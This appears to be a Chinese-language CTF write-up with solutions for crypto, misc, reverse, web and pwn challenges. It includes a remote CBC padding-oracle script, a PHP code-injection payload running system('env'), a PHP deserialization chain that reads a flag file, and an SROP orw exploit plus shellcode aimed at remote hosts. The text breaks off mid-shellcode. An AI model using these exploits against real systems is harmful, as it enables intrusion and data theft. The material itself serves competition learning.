CRYPTO
010101
漏洞点在
p1[random.choice([i for i, c in enumerate(p1) if c == '1'])] = '0'
p2[random.choice([i for i, c in enumerate(p1) if c == '0'])] = '1'
p1只是随机的把1的位置转一个变成0,p2把0的位置随机转一个到1,直接逆回去即可
charon@root:~/Desktop$ nc 124.71.177.14 10001
SHA256(XXXX + 46tr7JsAnftJaAj2):bb607c005123726d6b766c22aae953c9b940e577c6eee1834d58d7b4c8aed0bc
Give Me XXXX:
1syt
Press 1 to get ciphertext
1
601931745568249499510759548032330030128168426901273070135108480853460686109712873238769205673323573941222719784537226924574947597985995332502166447673441001472057573192590425110244259336665566840399026399551018101396712595423962517557464552888010288752202581798608635297757019300792569101528466013922325322822092646445549365017183336330682882553318397087064534370226045506964857754681072144336471423389761593593406118237164148519697161094101455148674927499073359298821885858263968557022279890949313151629256989634788665670244666317537906844506243326588724912144284308129885497937930904431382023656546569678307890221098404237878110718052217414533518187718577141777878618256549401606107380124774186720957506427850397517336771427932827081354648380523849869604469058309899083478421191903634686041340258157543389565237110421110793352394350936060146307177498557270482176301494468069342153700019972612521969441471535156604554033862954593971594760087406507833518758707886335001432738592043349819766112580767961940347583801771590121810049783524314577210369540270158799443707200466272512429348270033526294960198131258961436648025470841847299347420251330391980779752407494059038014071444906789619490650909907276294077937048058940562236799690917
10110110011110010010110100011101101110001110010111001111110110100101111110011100111010100101111101000010010001000111011000010000100111101000000011011101110011111100101011001010110110000111010111101110101110101001010100101011001110111101111101111000111100100001010111100110011101110011110000101100100011111011100001001001100110001101111101101101101100000101001111011111101001000001111010111100001100010001011101001101011010001110110000100100011100110010100111110101001001110111110110111110000000000011001001101010110000000010010000110100100110010110101000000111110010101001010100011000111000000000010010000101111000011111000010110010111011001000100011001001011000101111010011100101100100100011111011000101010000111011100000001011010010101101101101110101100010000111100111111101010001110100000111100111110000100000101110010111101000000011110111110100001010111011011001000011101100101001011000001100110000000011101110011111101000011001010101000111010010000101010010101101110111111110101000000001011111011111000111001110110101001100001000000010110010001010111000000000001001101000010001011111010010100100101000000000111100111001111011111011111000000001001101101000010011111010001011101010011011100111000001011001001001101001010100000110010100111110010010011110110010110111100001110111010101010101010111001000101110001110111111100110010011101111101101111001000110110010001011110011010000000011111100010110100001110101101010001100101001011010011010001011011101101010111111010000000001000000101100110110100011110001101010110100110111010111110011001001101011100111000010100010001001110000001000111101110010010100000111011010100110101110110100000001100100001101001001100101110100001000011010010110001000110111110000001001010110001100101000001000000010110101000111100100001010000010111011100010111011010010001010011011100001011000101000101010110100100001001110000001001011000011101100100011011011100001011100100001100000100111000011000010001000011110011111000011111011000101001110111000000100111101010001010100100000101001010010110110000011010011000100110011
363974195772145231697650077310086493709207023212754288977299477356401449767367884685507497439057315476058887282522651685773985772294344536235166524477663292807416570029315733179528577379504421255562298407728156586102101403178589940556788233347922215473108632642413216683654588730090728695353014477095209183054553113134830662110372665928957973715671446333444093092218507215396038787746527875979643339687945569730551806313156568746812468342482486546209624500679305929578612743025424384816593247796697730099729038972386405154049870284202733894691445908782979047583747805480771490450196971406525546547633889579020657723518264942003696915665961917952145217112253633848340252914175173075397993827903442120956864909938018097693848776019514421316178494154048707742544644528988010562573565558284797954675624387786817541580112660601516327573201366674069645447118005820926804579361542035220072853409208648240744370817666664321901270023789263924215039347973482121942421086705477108683641497511641488548191336178503962755347682824818128652286066613903859084167048583875734142764229143321297366252916602852741256994030818854232006056387114490752371418983540535937394700286498254726888830557455770169142748255294430133390313625632387288003135311581
?
exp
from gmpy2 import *
from Crypto.Util.number import *
from tqdm import *
n=601931745568249499510759548032330030128168426901273070135108480853460686109712873238769205673323573941222719784537226924574947597985995332502166447673441001472057573192590425110244259336665566840399026399551018101396712595423962517557464552888010288752202581798608635297757019300792569101528466013922325322822092646445549365017183336330682882553318397087064534370226045506964857754681072144336471423389761593593406118237164148519697161094101455148674927499073359298821885858263968557022279890949313151629256989634788665670244666317537906844506243326588724912144284308129885497937930904431382023656546569678307890221098404237878110718052217414533518187718577141777878618256549401606107380124774186720957506427850397517336771427932827081354648380523849869604469058309899083478421191903634686041340258157543389565237110421110793352394350936060146307177498557270482176301494468069342153700019972612521969441471535156604554033862954593971594760087406507833518758707886335001432738592043349819766112580767961940347583801771590121810049783524314577210369540270158799443707200466272512429348270033526294960198131258961436648025470841847299347420251330391980779752407494059038014071444906789619490650909907276294077937048058940562236799690917
p='10110110011110010010110100011101101110001110010111001111110110100101111110011100111010100101111101000010010001000111011000010000100111101000000011011101110011111100101011001010110110000111010111101110101110101001010100101011001110111101111101111000111100100001010111100110011101110011110000101100100011111011100001001001100110001101111101101101101100000101001111011111101001000001111010111100001100010001011101001101011010001110110000100100011100110010100111110101001001110111110110111110000000000011001001101010110000000010010000110100100110010110101000000111110010101001010100011000111000000000010010000101111000011111000010110010111011001000100011001001011000101111010011100101100100100011111011000101010000111011100000001011010010101101101101110101100010000111100111111101010001110100000111100111110000100000101110010111101000000011110111110100001010111011011001000011101100101001011000001100110000000011101110011111101000011001010101000111010010000101010010101101110111111110101000000001011111011111000111001110110101001100001000000010110010001010111000000000001001101000010001011111010010100100101000000000111100111001111011111011111000000001001101101000010011111010001011101010011011100111000001011001001001101001010100000110010100111110010010011110110010110111100001110111010101010101010111001000101110001110111111100110010011101111101101111001000110110010001011110011010000000011111100010110100001110101101010001100101001011010011010001011011101101010111111010000000001000000101100110110100011110001101010110100110111010111110011001001101011100111000010100010001001110000001000111101110010010100000111011010100110101110110100000001100100001101001001100101110100001000011010010110001000110111110000001001010110001100101000001000000010110101000111100100001010000010111011100010111011010010001010011011100001011000101000101010110100100001001110000001001011000011101100100011011011100001011100100001100000100111000011000010001000011110011111000011111011000101001110111000000100111101010001010100100000101001010010110110000011010011000100110011'
c=363974195772145231697650077310086493709207023212754288977299477356401449767367884685507497439057315476058887282522651685773985772294344536235166524477663292807416570029315733179528577379504421255562298407728156586102101403178589940556788233347922215473108632642413216683654588730090728695353014477095209183054553113134830662110372665928957973715671446333444093092218507215396038787746527875979643339687945569730551806313156568746812468342482486546209624500679305929578612743025424384816593247796697730099729038972386405154049870284202733894691445908782979047583747805480771490450196971406525546547633889579020657723518264942003696915665961917952145217112253633848340252914175173075397993827903442120956864909938018097693848776019514421316178494154048707742544644528988010562573565558284797954675624387786817541580112660601516327573201366674069645447118005820926804579361542035220072853409208648240744370817666664321901270023789263924215039347973482121942421086705477108683641497511641488548191336178503962755347682824818128652286066613903859084167048583875734142764229143321297366252916602852741256994030818854232006056387114490752371418983540535937394700286498254726888830557455770169142748255294430133390313625632387288003135311581
# p1=p[:1024]
# p2=p[1024:]
# pp1=[i for i, c in enumerate(p1) if c == '0']
# pp2=[i for i, c in enumerate(p1) if c == '1']
# print(pp1)
# for i in tqdm(pp1):
# p1 = list(p[:1024])
# p1[i]='1'
# for j in pp2:
# p2 = list(p[1024:])
# p2[j]='0'
# ppp=''.join(p1) + ''.join(p2)
# ppp2=int(ppp,2)
# if n%ppp2==0:
# print(ppp2)
# break
p=23035125732261132358670499878109017381474612877560501678840135971884602002596362770042962719837871778607403423140553717636949563024173949672281747566044348211883894971758093237914208347253908009359914127501739323351540268777972140879841918587634194478383649138731012434783470970638093549174619359989933572268463391374193459608549354611510909253795420360095279545780658678412847237770763508515088914878492525553581261678529131687242421476753253431930293211570439334452217877146659650508457581300434519215816445425880176422556848574152119462509229109443358566019337029013527249995191088717060570352636009477629767659827
print(isPrime(p))
q=n//p
e = 0x10001
d=invert(e,(p-1)*(q-1))
m=pow(c,d,n)
print(long_to_bytes(m))
b'D0g3{sYuWzkFk12A1gcWxG9pymFcjJL7CqN4Cq8PAIACObJ}'
POA
cbc padding attack
from pwn import *
from hashlib import sha256
import string
from pwnlib.util.iters import mbruteforce
import binascii
r = remote("124.71.177.14",10010)
table = string.ascii_letters+string.digits
def pow():
r.recvuntil("XXXX + ")
suffix = r.recv(16).decode("utf8")
r.recvuntil(":")
cipher = r.recvline().strip().decode("utf8")
proof = mbruteforce(lambda x: sha256((x + suffix).encode()).hexdigest() ==
cipher, table, length=4, method='fixed')
r.sendline(proof)
pow()
r.sendline('1')
r.recvuntil('This is your flag: ')
c=r.recvuntil('\n',drop=True)
print('c=',c)
iv = c[:32]
cipher = c[32:]
enc=binascii.unhexlify(cipher)
iv=binascii.unhexlify(iv)
print('enc=',enc)
print('iv=',iv)
pt = bytearray(b'\x00'*16)
for make_pad_len in range(1, 17):
xored_iv = bytearray(16)
for i in range(16):
xored_iv[i] = iv[i] ^ pt[i]
index = 16-make_pad_len
for i in range(0x100):
_iv = bytearray(16)
for j in range(index, 16):
_iv[j] = xored_iv[j] ^ make_pad_len
_iv[index] = i
_iv = bytes(_iv.rjust(16, b'\x00'))+enc
ivv=_iv.hex()
r.sendline('2')
r.recvuntil('Please enter ciphertext:\n')
# print('tt=',len(tt))
print('ivv=',ivv)
r.send(str(ivv))
res=r.recvuntil('\n')
# print('res=',res)
if b'True' in res:
v = i ^ iv[index] ^ make_pad_len
pt[index] = v
print(chr(v), pt.hex(), bytes(pt))
break
r.interactive()
ivv= 10660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fd
ivv= 11660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fd
ivv= 12660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fd
ivv= 13660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fd
ivv= 14660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fd
ivv= 15660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fd
ivv= 16660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fd
ivv= 17660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fd
ivv= 18660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fd
ivv= 19660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fd
M 4d467b305040643454746b7d04040404 b'MF{0P@d4Ttk}\x04\x04\x04\x04'
[*] Switching to interactive mode
D0g3{0P@d4Ttk}
Rabin
第一步爆破x,获得r,从而n1=n//r=p*q
第二步注意到inv_p*p+inv_q*q=n1+1,再加上p*q=n1,可以求得p,q
第三步,爆破e2,根据p,q直接求d,解密第二部分m,验证前10个字符isprintable就可以爆破出,e2 为 5,第二部分40-a9e4-a67a9ba15345}
第三步,根据relation(),以及第一步,判断x比较可能是8,根据e2,爆破e1是2,rabin解密得到第一段D0g3{82309bce-9db6-53
最终flag:D0g3{82309bce-9db6-5340-a9e4-a67a9ba15345}
Python代码如下:???????
from Crypto.Util.number import *
from gmpy2 import *
n = 285333097560579856892735567589027491455281816676548482904879584411084840450605271899236335787378212457644480538489333957199681005051324763317061914445335184643625612096862543286134102802857549376968548460142475231575293784694948584292852369440735047979684088368282494500434727138560870002195137014489167165627331632368455059106946492710112045617183371020744982960108917884038933243553293376828996387182739769132792122496876799056412450480295939241242493468339649702797915685408056205502660879129130498545921410634619659281124474952328520326377732861327885460825785663612083850698299251860568500798463658863076047273218029864658192865375924206328915181982984562250516942987232706349911392265126207255534866190377014380855435918220022982938162059864440683044775523888991188203006479911766073854154460130165113177584072109403534582913430806912608626570189230138578926612739070744683368688850886527094463667668825307246359436635233811527374246463299941661976846168659355118349992007638908363168630724274951
inv_p = 15518556384860245743478620429603192585685787953718242976660224479750998999124338822955414145628584896866254074982803409103638138579055846815417400924284717580342975268418607314979326166327341036902072011846895021125831579420772494902187900359222937225476944827334097644914928633555605528401231109679269995086
inv_q = 155844952786694191575297403428699000736198123964886234441336879931357938912183547278484904361669861403393518512602888045819050991788625527088116664969187555777028144199786402659623855374576202766323863308930997626431142188895581868394783999218343754370726823809671619460649473747905784816603565738974432428480
c1 = 126976144638062411994384099639219893719548652649797747968794241772829388392059131204549804095367482955713969969355185232593725760428681633925245739792469765283064470833596211603668120879365838887254328902988534426769340803326035688970033255868390278666156442829111587282507934612148101514683146219594379325568501808994038719784055659363522080979550015313702694077294838434724135616183144122907039758450363380287762050096893679619122349248941856699588431034712017310975233907480446137538753544059977757157457507646299200188974533402557530497781126307449150221146472482007846609714342333817505591830507656245367858711393207787365997909956902207542164544097922462033634018795680632571241102059887769247904527047628319436872644835675831505379779011242527097220466159871163455244971911311179106589058265977916423231213266773521104981166940713044082334510252946317916149089661406584941263677321406447326099096001132473765127971954144881177204994916711534164440380921197150440049304017047080659500777241740528
c2 = 146941331442564610016438819735547244506352704046774905613426284012869732747925710307265626766652735661835157362691409229558530888941189129960135439286471184689177437139594351730287457489682323200067610139473500557213628686488936379775312971741967583943854236936993185362784886957646210710012024839783323641398605391643544058597455541620941929330435766958836695050614733661967896963275403693970761214082313515330149780215334487889969179336091893274890943467738514867511025492419144817240630139160081094440537994689088123579690334770462633832325163789325881676740410159219779623129230840988303480150753783702883385763373756192046417120986761450383952686760580908911815204339547584815987309530429459803006137138710075476256076429790734381285100612579775390606666816783573924249773339782127155714010817196675330870127749087069339556243710348583718134476356016094530370196897414589976876765847625687561629780514239120563907981343926849715187507551839537984064153228278609868504300922982445067467503667611505
r=10407932194664399081925240327364085538615262247266704805319112350403608059673360298012239441732324184842421613954281007791383566248323464908139906605677320762924129509389220345773183349661583550472959420547689811211693677147548478866962501384438260291732348885311160828538416585028255604666224831890918801847068222203140521026698435488732958028878050869736186900714720710555703168729087
p=172734683184670521870728305371917464596062609133662457971030651681563614292692150176606848807534588267834112546004233695199322884456898046304537198440536833886920821550944800659049952451650465399792357613884244821145480278404875760748959392209037101099598435512738382399052937036823852468261051762813693137499
q=158711409682623467193918200983728047440421670534311259267841341750844583719487872424882600690624065414558783083519077629543263229349472283576912545178060245058165997332172994084313993698397899585980714769786106061192880855558784452710588701697475203159038487141201679925814406643761912866831915524057271725627
assert inv_p==invert(p,q)
assert inv_q==invert(q,p)
assert n==p*q*r
n1=n//r
#2 · 3^2 · 71
phi=(p-1)*(q-1)
def test(m):
for i in m:
if i<30 or i>128:
return 0
return 1
print(phi)
def relation(e1,e2):
a, b = 0, 0
for i in range(8 - (2**2 - 1)):
a += pow(e1, i)
for j in range(3):
b += pow(e2, j)
if a == b:
return True
return False
e1=2
e2=5
mp = pow(c1, (p + 1) // 4, p)
mq = pow(c1, (q + 1) // 4, q)
a = (inv_p * p * mq + inv_q * q * mp) % n1
b = n1 - int(a)
c = (inv_p * p * mq - inv_q * q * mp) % n1
d = n1- int(c)
for i in (a, b, c, d):
print(long_to_bytes(i))
exit()
exit()
for i in range(1,600):
if(relation(i,e2)):
print(i)
exit()
#D0g3{82309bce-9db6-5340-a9e4-a67a9ba15345}
from tqdm import tqdm
for i in tqdm(range(4,6)):
if gcd(i,phi)>1:
continue
d=invert(i,phi)
m=pow(c2,d,n1)
m=long_to_bytes(m)
if b"}" in m[:30] and test(m[:10])==1:
print(i,m)
exit()
for x in range(2,100):
r = 2
print("begin",x)
while True:
r = r * x
if r.bit_length() > 1024 and isPrime(r - 1):
r = r - 1
break
if n%r==0:
print(x,r)
MISC
dacongのWindows
桌面flag3一串PBE
根据描述提示注册表,windows.registry.printkey拿到一串字符d@@Coong_LiiKEE_F0r3NsIc
aes解出flag3
document下secret.rar
rstudio恢复出来解压有点问题,用vol3
?
一堆空白
很明显的snow了
拿到flag2
提示music
dacong_like_listen下面一堆wav,听上去就很像sstv,一个一个试过去
39.wav拿到flag1
拼接flag
flag{Ar3_Th3Y_tHE_DddddAc0Ng_SIst3Rs????}
签到处
D0g3{We1come_TO_AXB_F1111@g}
Nahida
reverse jpg
文件尾
反复提到眼睛,猜测silenteye。那个你一直在寻找的答案,早已出现在你的旅途,fuzz后指的是密码是题目名
dacongのsecret
png fft拿到第一个密码
同样套路,jpg文件尾reverse 压缩包
又要密码
回去看png,很明显19 chunk块长度小于0x10000,那么20 chunk块肯定是多余的(经测试删除后png不会少任何像素)
将19chunk块拿出来,补个png文件头(直接用题目png的文件头)
爆破一下宽高,860*123拿到key
解压后,一眼base64隐写
拿到pass,fuzz后是上一个jpg的jphs,拿到flag
?
疯狂的麦克斯
1.将docx文件转换为zip提取隐藏文件
2.将麦克斯的称号打开后解密零宽字符得到麦克斯的称号
3.将隐藏的txt文件打开后发现为一个列表,列表的末尾有一串密文
使用rot13并将amount设置为22后密文解密后得到THIS IS MKS DO YOU KNOW WHOAMI
4.将列表也进行同样的解密,根据题目描述,只要将列表每一个值进行base64加密后,就可以在其中找到正确的压缩包密码
脚本如下
???????import base64
lst = ['71132E', '328051N', '248199O'...]
# 加密函数
def encrypt_string(string):
? ? encoded_bytes = base64.b64encode(string.encode('utf-8'))
? ? return encoded_bytes.decode('utf-8')
# 打开文件
with open('output.txt', 'w') as file:
? ? # 遍历列表中的每一个值
? ? for value in lst:
? ? ? ? # 加密并写入文件
? ? ? ? encrypted_value = encrypt_string(value)
? ? ? ? file.write(encrypted_value + '\n')
爆破
解压压缩包得到flag
REVERSE
MobileGo
libgojni.so的mobile_go_Checkflag函数完成加密,首先初始化随机数生成器,种子为2023
之后随机生成两个随机数并将其作为索引完成flag中字符位置的互换
解密脚本如下,首先通过Go语言生成伪随机数
package main
import (
"fmt"
"math/rand"
)
func main() {
source := rand.NewSource(2023)
random := rand.New(source)
for i := 0; i < 0x26; i++ {
randomNumber := random.Intn(0x26)
randomNumber1 := random.Intn(0x26)
fmt.Print("[", randomNumber, ",", randomNumber1, "]")
fmt.Print(",")
}
}
然后从后往前还原,密文从Android的资源文件中提取
???????
flag=bytearray(b"49021}5f919038b440139g74b7Dc88330e5d{6")
key=[[11,14],[15,37],[24,18],[8,30],[6,9],[30,3],[29,9],[4,13],[13,24],[37,1],[28,28],[3,1],[23,22],[21,26],[7,19],[1,34],[37,17],[27,29],[31,30],[14,2],[35,34],[4,27],[9,3],[3,24],[30,29],[3,27],[14,25],[26,0],[4,28],[5,15],[9,9],[13,18],[24,3],[35,24],[36,27],[25,21],[11,4],[27,28]]
for row in reversed(key):
tmp=flag[row[0]]
flag[row[0]]=flag[row[1]]
flag[row[1]]=tmp
print(flag)
D0g3{4c3b5903d11461f94478b7302980e958}
你见过蓝色的小鲸鱼
通过IDA插件可知`BlowFish`加密算法,用户名作为密钥,提取密文后编写脚本解密
from Crypto.Cipher import Blowfish
key=b'UzBtZTBuZV9EMGcz'
bf=Blowfish.new(key,Blowfish.MODE_ECB)
enc=b"\x11\xA5\x1F\x04\x95\x50\xE2\x50\x8F\x17\xE1\x6C\xF1\x63\x2B\x47"
print(bf.decrypt(enc))
#QHRoZWJsdWVmMXNo
牢大想你了
反编译Assembly-CSharp.dll文件
其中GameManager.OnValueChanged对输入完成TEA加密
解密脚本如下
#include<string.h>
#include <stdio.h>
int main()
{
unsigned int Data[12] = { 3363017039U,
1247970816U,
549943836U,
445086378U,
3606751618U,
1624361316U,
3112717362U,
705210466U,
3343515702U,
2402214294U,
4010321577U,
2743404694U };
unsigned int key[4] = { 286331153,
286331153,
286331153,
286331153 };
unsigned int tmp[2] = { 0 };
unsigned int sum = 0;
unsigned int delta = 0x9e3779b9;
for (int i = 0; i < 12; i += 2)
{
tmp[0] = Data[i];
tmp[1] = Data[i + 1];
sum = delta * 32;
for (int j = 0; j < 32; ++j)
{
tmp[1] -= ((tmp[0] << 4) + key[2]) ^ (tmp[0] + sum) ^ ((tmp[0] >> 5) + key[3]);
tmp[0] -= ((tmp[1] << 4) + key[0]) ^ (tmp[1] + sum) ^ ((tmp[1] >> 5) + key[1]);
sum -= delta;
}
Data[i] = tmp[0];
Data[i + 1] = tmp[1];
printf("%c%c%c%c%c%c%c%c", ((char*)&Data[i])[0], ((char*)&Data[i])[1], ((char*)&Data[i])[2], ((char*)&Data[i])[3], ((char*)&Data[i + 1])[0], ((char*)&Data[i + 1])[1], ((char*)&Data[i + 1])[2], ((char*)&Data[i + 1])[3]);
}
return 0;
}
结果为 it_is_been_a_long_day_without_you_my_friend
你好,PE
找到关键代码,有点像CRC64
搜了个脚本一把梭
import struct
def decode_k(v):
is_negative = v & 1
if is_negative:
v ^= 0x54AA4A9
v >>= 1
if is_negative:
v |= 0x8000000000000000
return v
g_key = '4DB87629F5A99E595556B1C42F212C30B3797817A8EDF7DBE153F0DBE903515E09C100DFF096FCC1B5E6629501000000'
g_key = bytearray.fromhex(g_key)
single_len = 8
g_output = [g_key[x:x+single_len] for x in range(0, 6*single_len, single_len)]
g_output = [struct.unpack('<Q', x)[0] for x in g_output]
def decode_j(v):
for k in range(64):
v = decode_k(v)
return v
r = [decode_j(x) for x in g_output]
flag = [struct.pack('<Q', x) for x in r]
flag = [x.decode() for x in flag]
print(''.join(flag))#D0g3{60E1E72A-576A8BF0-7701CBB9-B02415EC}
感觉有点点简单
主函数获取数据后进行魔改rc4和魔改base64加密
rc4魔改了sbox的大小和最后异或结果
base64魔改了表和位运算的操作
解密脚本
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#define sboxSize 64
unsigned char findPos(const unsigned char* base64_map, unsigned char c)//查找下标所在位置
{
for (int i = 0; i < strlen((const char*)base64_map); i++)
{
if (base64_map[i] == c)
return i;
}
}
unsigned char* base64_decode(const unsigned char* code0)
{
unsigned char* code = (unsigned char*)code0;
unsigned char base64_map[65] = "4KBbSzwWClkZ2gsr1qA+Qu0FtxOm6/iVcJHPY9GNp7EaRoDf8UvIjnL5MydTX3eh";
long len, str_len, flag = 0;
unsigned char* res;
len = strlen((const char*)code);
if (code[len - 1] == '=')
{
if (code[len - 2] == '=')
{
flag = 1;
str_len = len / 4 * 3 - 2;
}
else
{
flag = 2;
str_len = len / 4 * 3 - 1;
}
}
else
str_len = len / 4 * 3;
res = (unsigned char*)malloc(sizeof(unsigned char) * str_len + 1);
unsigned char a[4] = { 0 };
for (int i = 0, j = 0; j < str_len - flag; j += 3, i += 4)
{
a[0] = findPos(base64_map, code[i]); //code[]每一个字符对应base64表中的位置,用位置值反推原始数据值
a[1] = findPos(base64_map, code[i + 1]);
a[2] = findPos(base64_map, code[i + 2]);
a[3] = findPos(base64_map, code[i + 3]);
res[j] = a[0] | ((a[1] & 0x3) << 6);//第一个字符对应
res[j + 1] = ((a[1] & 0x3c) >> 2) | ((a[2] & 0xf) << 4);
res[j + 2] = ((a[3] & 0x3f) << 2) | ((a[2] & 0x30) >> 4);
//res[j] = a[0] << 2 | a[1] >> 4; //取出第一个字符对应base64表的十进制数的前6位与第二个字符对应base64表的十进制数的后2位进行组合
//res[j + 1] = a[1] << 4 | a[2] >> 2; //取出第二个字符对应base64表的十进制数的后4位与第三个字符对应bas464表的十进制数的后4位进行组合
//res[j + 2] = a[2] << 6 | a[3]; //取出第三个字符对应base64表的十进制数的后2位与第4个字符进行组合
}
switch (flag)
{
case 0:break;
case 1:
{
a[0] = findPos(base64_map, code[len - 4]);
a[1] = findPos(base64_map, code[len - 3]);
res[str_len - 1] = a[0] | ((a[1] & 0x3) << 6);
break;
}
case 2: {
a[0] = findPos(base64_map, code[len - 4]);
a[1] = findPos(base64_map, code[len - 3]);
a[2] = findPos(base64_map, code[len - 2]);
res[str_len - 2] = a[0] | ((a[1] & 0x3) << 6);//第一个字符对应
res[str_len - 1] = ((a[1] & 0x3c) >> 2) | ((a[2] & 0xf) << 4);
//res[str_len - 2] = a[0] << 2 | a[1] >> 4;
//res[str_len - 1] = a[1] << 4 | a[2] >> 2;
break;
}
}
res[str_len] = '\0';
return res;
}
unsigned char sbox[sboxSize] = { 0 };
void swap(unsigned char* a, unsigned char* b)
{
unsigned char tmp = *a;
*a = *b;
*b = tmp;
}
void init_sbox(unsigned char key[], int keyLen) {
for (unsigned int i = 0; i < sboxSize; i++)//赋值
sbox[i] = i;
unsigned char Ttable[sboxSize] = { 0 };
for (int i = 0; i < sboxSize; i++)
Ttable[i] = key[i % keyLen];//根据初始化t表
for (int j = 0, i = 0; i < sboxSize; i++)
{
j = (j + sbox[i] + Ttable[i]) % sboxSize; //打乱s盒
swap(&sbox[i], &sbox[j]);
}
}
void RC4_enc_dec(unsigned char data[], int dataLen, unsigned char key[], int keyLen) {
unsigned char i = 0, j = 0;
init_sbox(key, keyLen);
for (unsigned int h = 0; h < dataLen; h++)
{
i = (i + 1) % sboxSize;
j = (j + sbox[i]) % sboxSize;
swap(&sbox[i], &sbox[j]);
data[h] ^= (i^j)&sbox[(((i^j)+sbox[i]+sbox[j])%sboxSize)];
}
}
int main() {
unsigned char BaseData[] = "6zviISn2McHsa4b108v29tbKMtQQXQHA+2+sTYLlg9v2Q2Pq8SP24Uw=";
unsigned char* result=base64_decode(BaseData);//魔改base
RC4_enc_dec(result, 41,(unsigned char*)"the_key_", 8);//魔改rc4
printf("%s", result);
return 0;
}
WEB
what’s my name
?d0g3=’”]);}system(‘env’);;;;/*include&name=%00lambda_32
跑32次
easy_unserialize???????
<?php
class Good{
public $g1;
private $gg2='*&';
}
class Luck{
public $l1;
public $ll2;
private $md5=1131911;
public $lll3;
}
class To{
public $t1;
public $tt2;
public $arg1 = array("guangji"=>1);
}
class You{
public $y1;
}
class Flag{
}
$F = new Flag;
$F->SplFileObject = "/FfffLlllLaAaaggGgGg";
$F->b = "";
$l2 = new Luck;
$l2->l1 = $F;
$t2 = new To;
$t2->t1 = $l2;
$l = new Luck;
$l->ll2 = $t2;
$t = new To;
$t->tt2 = $l;
$g = new Good;
$g->g1 = $t;
$r = new Luck;
$r->lll3 = $g;
$q = new You;
$q->y1 = $r;
echo urlencode(serialize($q));
payload
D0g3=O%3A3%3A%22You%22%3A1%3A%7Bs%3A2%3A%22y1%22%3BO%3A4%3A%22Luck%22%3A4%3A%7Bs%3A2%3A%22l1%22%3BN%3Bs%3A3%3A%22ll2%22%3BN%3Bs%3A9%3A%22%00Luck%00md5%22%3Bi%3A1131911%3Bs%3A4%3A%22lll3%22%3BO%3A4%3A%22Good%22%3A2%3A%7Bs%3A2%3A%22g1%22%3BO%3A2%3A%22To%22%3A3%3A%7Bs%3A2%3A%22t1%22%3BN%3Bs%3A3%3A%22tt2%22%3BO%3A4%3A%22Luck%22%3A4%3A%7Bs%3A2%3A%22l1%22%3BN%3Bs%3A3%3A%22ll2%22%3BO%3A2%3A%22To%22%3A3%3A%7Bs%3A2%3A%22t1%22%3BO%3A4%3A%22Luck%22%3A4%3A%7Bs%3A2%3A%22l1%22%3BO%3A4%3A%22Flag%22%3A2%3A%7Bs%3A13%3A%22SplFileObject%22%3Bs%3A20%3A%22%2FFfffLlllLaAaaggGgGg%22%3Bs%3A1%3A%22b%22%3Bs%3A0%3A%22%22%3B%7Ds%3A3%3A%22ll2%22%3BN%3Bs%3A9%3A%22%00Luck%00md5%22%3Bi%3A1131911%3Bs%3A4%3A%22lll3%22%3BN%3B%7Ds%3A3%3A%22tt2%22%3BN%3Bs%3A4%3A%22arg1%22%3Ba%3A1%3A%7Bs%3A7%3A%22guangji%22%3Bi%3A1%3B%7D%7Ds%3A9%3A%22%00Luck%00md5%22%3Bi%3A1131911%3Bs%3A4%3A%22lll3%22%3BN%3B%7Ds%3A4%3A%22arg1%22%3Ba%3A1%3A%7Bs%3A7%3A%22guangji%22%3Bi%3A1%3B%7D%7Ds%3A9%3A%22%00Good%00gg2%22%3Bs%3A2%3A%22%2A%26%22%3B%7D%7D%7D
PWN
seccomp
一个输入长gadget的全局变量,一次溢出机会
有沙箱,但是可以orw读出flag,借助一部分srop的手法加以利用???????
from pwn import *
import time
import subprocess
context(arch='amd64',os='linux',log_level='debug')
command = "ls -l"
#p = process('./chall')
p=remote("47.108.206.43",22039)
elf = ELF("./chall")
#libc = ELF("./libc-2.23.so")
#libc = ELF("./libc.so.6")
#context(arch="amd64",os="linux",log_level="debug")
def s(a) : p.send(a)
def sa(a, b) : p.sendafter(a, b)
def sl(a) : p.sendline(a)
def sla(a, b) : p.sendlineafter(a, b)
def r() : return p.recv()
def pr() : print(p.recv())
def rl(a) : return p.recvuntil(a)
def inter() : p.interactive()
def get_addr():
return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
#752
leave = 0x40136c
sig = 0x0000000000401194
sy = 0x000000000040118a
#gdb.attach(p)
opena = SigreturnFrame()
opena.rax = 0
opena.rdi = 2
opena.rsi = 0x404060
opena.rdx = 0
opena.rcx = 0
opena.rip = elf.plt['syscall']
opena.rbp = 0x404060 + 0x20
opena.rsp = 0x404170
read1 = SigreturnFrame()
read1.rax = 0
read1.rdi = 0
read1.rsi = 3
read1.rdx = 0x404560
read1.rcx = 0x30
read1.rip = elf.plt['syscall']
read1.rbp = 0x404060 + 0x20
read1.rsp = 0x404170+(0x404170-0x404060)-8
write = SigreturnFrame()
write.rax = 0
write.rdi = 1
write.rsi = 1
write.rdx = 0x404560
write.rcx = 0x30
write.rip = elf.plt['syscall']
write.rbp = 0x404060 + 0x20
write.rsp = 0x404170+(0x404170-0x404060)
sla("easyhack",b'./flag\x00\x00'+p64(sig)+p64(sy)+flat(opena)+p64(sig)+p64(sy)+flat(read1)+p64(sig)+p64(sy)+flat(write))
sla("SUID?",b'a'*(0x2a)+p64(0x404060)+p64(leave))
p.interactive()
side_channel,initiate!??????
from pwn import *
context.log_level = 'ERROR'
context.terminal = ['wt.exe', 'wsl.exe', 'bash', '-c']
context.binary = './chall'
binary = context.binary
REMOTE = args.REMOTE or 1
syscall = 0x40118A
bss = 0x404060
FLAG = '/flag'
code = shellcraft.open(FLAG, 'O_RDONLY', 'rdx')
code += shellcraft.read(3, bss+0xE00, 0x100)
code += '''
xor eax, eax
mov rdi, 0
mov rsi, 0x404F60
mov rdx, 2
syscall
movzx rcx, byte ptr [0x404F60]
movzx rax, byte ptr [0x404F61]
movzx rbx, byte ptr [0x404E60+rcx]
cmp rax, rbx
jge L_HANG
jmp L_EXIT
L_HANG:
xor eax, eax
mov rdi, 0
